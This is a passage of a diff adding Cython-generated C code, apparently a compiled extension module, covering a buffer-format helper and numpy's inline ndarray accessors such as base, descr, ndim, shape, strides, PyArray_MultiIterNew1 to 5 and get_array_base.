+ __pyx_t_4 = PyUnicode_Join(__pyx_kp_u__14, __pyx_v_extents); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1479, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_10 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_4) > __pyx_t_10) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_4) : __pyx_t_10; + __pyx_t_9 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_t_4); + __pyx_t_4 = 0; + __Pyx_INCREF(__pyx_kp_u__7); + __pyx_t_9 += 1; + __Pyx_GIVEREF(__pyx_kp_u__7); + PyTuple_SET_ITEM(__pyx_t_5, 2, __pyx_kp_u__7); + __pyx_t_4 = __Pyx_PyUnicode_Join(__pyx_t_5, 3, __pyx_t_9, __pyx_t_10); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1479, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_5 = PyUnicode_AsASCIIString(((PyObject*)__pyx_t_4)); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 1479, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = PyNumber_Add(__pyx_t_5, __pyx_v_result); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1479, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (!(likely(PyBytes_CheckExact(__pyx_t_4)) || __Pyx_RaiseUnexpectedTypeError("bytes", __pyx_t_4))) __PYX_ERR(1, 1479, __pyx_L1_error) + __Pyx_DECREF_SET(__pyx_v_result, ((PyObject*)__pyx_t_4)); + __pyx_t_4 = 0; + + /* "BufferFormatFromTypeInfo":1477 + * fmt = __Pyx_TypeInfoToFormat(type) + * result = fmt.string + * if type.arraysize[0]: # <<<<<<<<<<<<<< + * extents = [f"{type.arraysize[i]}" for i in range(type.ndim)] + * result = f"({u','.join(extents)})".encode('ascii') + result + */ + } + } + __pyx_L3:; + + /* "BufferFormatFromTypeInfo":1481 + * result = f"({u','.join(extents)})".encode('ascii') + result + * + * return result # <<<<<<<<<<<<<< + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_result); + __pyx_r = __pyx_v_result; + goto __pyx_L0; + + /* "BufferFormatFromTypeInfo":1450 + * + * @cname('__pyx_format_from_typeinfo') + * cdef bytes format_from_typeinfo(__Pyx_TypeInfo *type): # <<<<<<<<<<<<<< + * cdef __Pyx_StructField *field + * cdef __pyx_typeinfo_string fmt + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_AddTraceback("BufferFormatFromTypeInfo.format_from_typeinfo", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_part); + __Pyx_XDECREF(__pyx_v_result); + __Pyx_XDECREF(__pyx_v_alignment); + __Pyx_XDECREF(__pyx_v_parts); + __Pyx_XDECREF(__pyx_v_extents); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":245 + * + * @property + * cdef inline PyObject* base(self) nogil: # <<<<<<<<<<<<<< + * """Returns a borrowed reference to the object owning the data/memory. + * """ + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_7ndarray_4base_base(PyArrayObject *__pyx_v_self) { + PyObject *__pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":248 + * """Returns a borrowed reference to the object owning the data/memory. + * """ + * return PyArray_BASE(self) # <<<<<<<<<<<<<< + * + * @property + */ + __pyx_r = PyArray_BASE(__pyx_v_self); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":245 + * + * @property + * cdef inline PyObject* base(self) nogil: # <<<<<<<<<<<<<< + * """Returns a borrowed reference to the object owning the data/memory. + * """ + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":251 + * + * @property + * cdef inline dtype descr(self): # <<<<<<<<<<<<<< + * """Returns an owned reference to the dtype of the array. + * """ + */ + +static CYTHON_INLINE PyArray_Descr *__pyx_f_5numpy_7ndarray_5descr_descr(PyArrayObject *__pyx_v_self) { + PyArray_Descr *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyArray_Descr *__pyx_t_1; + __Pyx_RefNannySetupContext("descr", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":254 + * """Returns an owned reference to the dtype of the array. + * """ + * return PyArray_DESCR(self) # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF((PyObject *)__pyx_r); + __pyx_t_1 = PyArray_DESCR(__pyx_v_self); + __Pyx_INCREF((PyObject *)((PyArray_Descr *)__pyx_t_1)); + __pyx_r = ((PyArray_Descr *)__pyx_t_1); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":251 + * + * @property + * cdef inline dtype descr(self): # <<<<<<<<<<<<<< + * """Returns an owned reference to the dtype of the array. + * """ + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF((PyObject *)__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":257 + * + * @property + * cdef inline int ndim(self) nogil: # <<<<<<<<<<<<<< + * """Returns the number of dimensions in the array. + * """ + */ + +static CYTHON_INLINE int __pyx_f_5numpy_7ndarray_4ndim_ndim(PyArrayObject *__pyx_v_self) { + int __pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":260 + * """Returns the number of dimensions in the array. + * """ + * return PyArray_NDIM(self) # <<<<<<<<<<<<<< + * + * @property + */ + __pyx_r = PyArray_NDIM(__pyx_v_self); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":257 + * + * @property + * cdef inline int ndim(self) nogil: # <<<<<<<<<<<<<< + * """Returns the number of dimensions in the array. + * """ + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":263 + * + * @property + * cdef inline npy_intp *shape(self) nogil: # <<<<<<<<<<<<<< + * """Returns a pointer to the dimensions/shape of the array. + * The number of elements matches the number of dimensions of the array (ndim). + */ + +static CYTHON_INLINE npy_intp *__pyx_f_5numpy_7ndarray_5shape_shape(PyArrayObject *__pyx_v_self) { + npy_intp *__pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":268 + * Can return NULL for 0-dimensional arrays. + * """ + * return PyArray_DIMS(self) # <<<<<<<<<<<<<< + * + * @property + */ + __pyx_r = PyArray_DIMS(__pyx_v_self); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":263 + * + * @property + * cdef inline npy_intp *shape(self) nogil: # <<<<<<<<<<<<<< + * """Returns a pointer to the dimensions/shape of the array. + * The number of elements matches the number of dimensions of the array (ndim). + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":271 + * + * @property + * cdef inline npy_intp *strides(self) nogil: # <<<<<<<<<<<<<< + * """Returns a pointer to the strides of the array. + * The number of elements matches the number of dimensions of the array (ndim). + */ + +static CYTHON_INLINE npy_intp *__pyx_f_5numpy_7ndarray_7strides_strides(PyArrayObject *__pyx_v_self) { + npy_intp *__pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":275 + * The number of elements matches the number of dimensions of the array (ndim). + * """ + * return PyArray_STRIDES(self) # <<<<<<<<<<<<<< + * + * @property + */ + __pyx_r = PyArray_STRIDES(__pyx_v_self); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":271 + * + * @property + * cdef inline npy_intp *strides(self) nogil: # <<<<<<<<<<<<<< + * """Returns a pointer to the strides of the array. + * The number of elements matches the number of dimensions of the array (ndim). + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":278 + * + * @property + * cdef inline npy_intp size(self) nogil: # <<<<<<<<<<<<<< + * """Returns the total size (in number of elements) of the array. + * """ + */ + +static CYTHON_INLINE npy_intp __pyx_f_5numpy_7ndarray_4size_size(PyArrayObject *__pyx_v_self) { + npy_intp __pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":281 + * """Returns the total size (in number of elements) of the array. + * """ + * return PyArray_SIZE(self) # <<<<<<<<<<<<<< + * + * @property + */ + __pyx_r = PyArray_SIZE(__pyx_v_self); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":278 + * + * @property + * cdef inline npy_intp size(self) nogil: # <<<<<<<<<<<<<< + * """Returns the total size (in number of elements) of the array. + * """ + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":284 + * + * @property + * cdef inline char* data(self) nogil: # <<<<<<<<<<<<<< + * """The pointer to the data buffer as a char*. + * This is provided for legacy reasons to avoid direct struct field access. + */ + +static CYTHON_INLINE char *__pyx_f_5numpy_7ndarray_4data_data(PyArrayObject *__pyx_v_self) { + char *__pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":290 + * of `PyArray_DATA()` instead, which returns a 'void*'. + * """ + * return PyArray_BYTES(self) # <<<<<<<<<<<<<< + * + * ctypedef unsigned char npy_bool + */ + __pyx_r = PyArray_BYTES(__pyx_v_self); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":284 + * + * @property + * cdef inline char* data(self) nogil: # <<<<<<<<<<<<<< + * """The pointer to the data buffer as a char*. + * This is provided for legacy reasons to avoid direct struct field access. + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":776 + * ctypedef npy_cdouble complex_t + * + * cdef inline object PyArray_MultiIterNew1(a): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(1, a) + * + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_PyArray_MultiIterNew1(PyObject *__pyx_v_a) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("PyArray_MultiIterNew1", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":777 + * + * cdef inline object PyArray_MultiIterNew1(a): + * return PyArray_MultiIterNew(1, a) # <<<<<<<<<<<<<< + * + * cdef inline object PyArray_MultiIterNew2(a, b): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyArray_MultiIterNew(1, ((void *)__pyx_v_a)); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 777, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":776 + * ctypedef npy_cdouble complex_t + * + * cdef inline object PyArray_MultiIterNew1(a): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(1, a) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("numpy.PyArray_MultiIterNew1", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":779 + * return PyArray_MultiIterNew(1, a) + * + * cdef inline object PyArray_MultiIterNew2(a, b): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(2, a, b) + * + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_PyArray_MultiIterNew2(PyObject *__pyx_v_a, PyObject *__pyx_v_b) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("PyArray_MultiIterNew2", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":780 + * + * cdef inline object PyArray_MultiIterNew2(a, b): + * return PyArray_MultiIterNew(2, a, b) # <<<<<<<<<<<<<< + * + * cdef inline object PyArray_MultiIterNew3(a, b, c): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyArray_MultiIterNew(2, ((void *)__pyx_v_a), ((void *)__pyx_v_b)); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 780, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":779 + * return PyArray_MultiIterNew(1, a) + * + * cdef inline object PyArray_MultiIterNew2(a, b): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(2, a, b) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("numpy.PyArray_MultiIterNew2", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":782 + * return PyArray_MultiIterNew(2, a, b) + * + * cdef inline object PyArray_MultiIterNew3(a, b, c): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(3, a, b, c) + * + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_PyArray_MultiIterNew3(PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("PyArray_MultiIterNew3", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":783 + * + * cdef inline object PyArray_MultiIterNew3(a, b, c): + * return PyArray_MultiIterNew(3, a, b, c) # <<<<<<<<<<<<<< + * + * cdef inline object PyArray_MultiIterNew4(a, b, c, d): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyArray_MultiIterNew(3, ((void *)__pyx_v_a), ((void *)__pyx_v_b), ((void *)__pyx_v_c)); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 783, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":782 + * return PyArray_MultiIterNew(2, a, b) + * + * cdef inline object PyArray_MultiIterNew3(a, b, c): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(3, a, b, c) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("numpy.PyArray_MultiIterNew3", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":785 + * return PyArray_MultiIterNew(3, a, b, c) + * + * cdef inline object PyArray_MultiIterNew4(a, b, c, d): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(4, a, b, c, d) + * + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_PyArray_MultiIterNew4(PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c, PyObject *__pyx_v_d) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("PyArray_MultiIterNew4", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":786 + * + * cdef inline object PyArray_MultiIterNew4(a, b, c, d): + * return PyArray_MultiIterNew(4, a, b, c, d) # <<<<<<<<<<<<<< + * + * cdef inline object PyArray_MultiIterNew5(a, b, c, d, e): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyArray_MultiIterNew(4, ((void *)__pyx_v_a), ((void *)__pyx_v_b), ((void *)__pyx_v_c), ((void *)__pyx_v_d)); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 786, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":785 + * return PyArray_MultiIterNew(3, a, b, c) + * + * cdef inline object PyArray_MultiIterNew4(a, b, c, d): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(4, a, b, c, d) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("numpy.PyArray_MultiIterNew4", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":788 + * return PyArray_MultiIterNew(4, a, b, c, d) + * + * cdef inline object PyArray_MultiIterNew5(a, b, c, d, e): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(5, a, b, c, d, e) + * + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_PyArray_MultiIterNew5(PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c, PyObject *__pyx_v_d, PyObject *__pyx_v_e) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("PyArray_MultiIterNew5", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":789 + * + * cdef inline object PyArray_MultiIterNew5(a, b, c, d, e): + * return PyArray_MultiIterNew(5, a, b, c, d, e) # <<<<<<<<<<<<<< + * + * cdef inline tuple PyDataType_SHAPE(dtype d): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyArray_MultiIterNew(5, ((void *)__pyx_v_a), ((void *)__pyx_v_b), ((void *)__pyx_v_c), ((void *)__pyx_v_d), ((void *)__pyx_v_e)); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 789, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":788 + * return PyArray_MultiIterNew(4, a, b, c, d) + * + * cdef inline object PyArray_MultiIterNew5(a, b, c, d, e): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(5, a, b, c, d, e) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("numpy.PyArray_MultiIterNew5", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":791 + * return PyArray_MultiIterNew(5, a, b, c, d, e) + * + * cdef inline tuple PyDataType_SHAPE(dtype d): # <<<<<<<<<<<<<< + * if PyDataType_HASSUBARRAY(d): + * return d.subarray.shape + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_PyDataType_SHAPE(PyArray_Descr *__pyx_v_d) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + __Pyx_RefNannySetupContext("PyDataType_SHAPE", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":792 + * + * cdef inline tuple PyDataType_SHAPE(dtype d): + * if PyDataType_HASSUBARRAY(d): # <<<<<<<<<<<<<< + * return d.subarray.shape + * else: + */ + __pyx_t_1 = PyDataType_HASSUBARRAY(__pyx_v_d); + if (__pyx_t_1) { + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":793 + * cdef inline tuple PyDataType_SHAPE(dtype d): + * if PyDataType_HASSUBARRAY(d): + * return d.subarray.shape # <<<<<<<<<<<<<< + * else: + * return () + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(((PyObject*)__pyx_v_d->subarray->shape)); + __pyx_r = ((PyObject*)__pyx_v_d->subarray->shape); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":792 + * + * cdef inline tuple PyDataType_SHAPE(dtype d): + * if PyDataType_HASSUBARRAY(d): # <<<<<<<<<<<<<< + * return d.subarray.shape + * else: + */ + } + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":795 + * return d.subarray.shape + * else: + * return () # <<<<<<<<<<<<<< + * + * + */ + /*else*/ { + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_empty_tuple); + __pyx_r = __pyx_empty_tuple; + goto __pyx_L0; + } + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":791 + * return PyArray_MultiIterNew(5, a, b, c, d, e) + * + * cdef inline tuple PyDataType_SHAPE(dtype d): # <<<<<<<<<<<<<< + * if PyDataType_HASSUBARRAY(d): + * return d.subarray.shape + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":970 + * int _import_umath() except -1 + * + * cdef inline void set_array_base(ndarray arr, object base): # <<<<<<<<<<<<<< + * Py_INCREF(base) # important to do this before stealing the reference below! + * PyArray_SetBaseObject(arr, base) + */ + +static CYTHON_INLINE void __pyx_f_5numpy_set_array_base(PyArrayObject *__pyx_v_arr, PyObject *__pyx_v_base) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("set_array_base", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":971 + * + * cdef inline void set_array_base(ndarray arr, object base): + * Py_INCREF(base) # important to do this before stealing the reference below! # <<<<<<<<<<<<<< + * PyArray_SetBaseObject(arr, base) + * + */ + Py_INCREF(__pyx_v_base); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":972 + * cdef inline void set_array_base(ndarray arr, object base): + * Py_INCREF(base) # important to do this before stealing the reference below! + * PyArray_SetBaseObject(arr, base) # <<<<<<<<<<<<<< + * + * cdef inline object get_array_base(ndarray arr): + */ + (void)(PyArray_SetBaseObject(__pyx_v_arr, __pyx_v_base)); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":970 + * int _import_umath() except -1 + * + * cdef inline void set_array_base(ndarray arr, object base): # <<<<<<<<<<<<<< + * Py_INCREF(base) # important to do this before stealing the reference below! + * PyArray_SetBaseObject(arr, base) + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":974 + * PyArray_SetBaseObject(arr, base) + * + * cdef inline object get_array_base(ndarray arr): # <<<<<<<<<<<<<< + * base = PyArray_BASE(arr) + * if base is NULL: + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_get_array_base(PyArrayObject *__pyx_v_arr) { + PyObject *__pyx_v_base; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + __Pyx_RefNannySetupContext("get_array_base", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":975 + * + * cdef inline object get_array_base(ndarray arr): + * base = PyArray_BASE(arr) # <<<<<<<<<<<<<< + * if base is NULL: + * return None + */ + __pyx_v_base = PyArray_BASE(__pyx_v_arr); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":976 + * cdef inline object get_array_base(ndarray arr): + * base = PyArray_BASE(arr) + * if base is NULL: # <<<<<<<<<<<<<< + * return None + * return base + */ + __pyx_t_1 = (__pyx_v_base == NULL); + if (__pyx_t_1) { + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":977 + * base = PyArray_BASE(arr) + * if base is NULL: + * return None # <<<<<<<<<<<<<< + * return base + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":976 + * cdef inline object get_array_base(ndarray arr): + * base = PyArray_BASE(arr) + * if base is NULL: # <<<<<<<<<<<<<< + * return None + * return base + */ + } + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":978 + * if base is NULL: + * return None + * return base # <<<<<<<<<<<<<< + * + * # Versions of the import_* functions which are more suitable for + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(((PyObject *)__pyx_v_base)); + __pyx_r = ((PyObject *)__pyx_v_base); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":974 + * PyArray_SetBaseObject(arr, base) + * + * cdef inline object get_array_base(ndarray arr): # <<<<<<<<<<<<<< + * base = PyArray_BASE(arr) + * if base is NULL: + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":982 + * # Versions of the import_* functions which are more suitable for + * # Cython code. + * cdef inline int import_array() except -1: # <<<<<<<<<<<<<< + * try: + * __pyx_import_array() + */ + +static CYTHON_INLINE int __pyx_f_5numpy_import_array(void) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("import_array", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":983 + * # Cython code. + * cdef inline int import_array() except -1: + * try: # 